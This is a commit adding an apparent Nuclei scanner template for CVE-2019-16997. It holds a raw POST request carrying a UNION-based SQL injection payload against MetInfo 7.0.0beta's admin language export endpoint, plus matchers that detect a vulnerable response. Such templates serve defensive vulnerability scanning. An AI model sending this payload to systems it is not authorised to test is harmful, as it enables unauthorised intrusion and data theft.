Create CVE-2019-16997.yaml

cves/2019/CVE-2019-16997.yaml

@@ -0,0 +1,33 @@
+id: CVE-2019-16997
+
+info:
+  name: Metinfo7.0.0beta SQLI
+  author: ritikchaddha
+  severity: high
+  description: SQL injection vulnerability discovered in MetInfo 7.0.0beta.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16997
+  tags: metinfo,sqli
+
+requests:
+  - raw:
+      - |
+        POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        appno= 1 union SELECT 98989*44313,1&editor=cn&site=web
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "4386499557"
+
+      - type: status
+        status:
+          - 200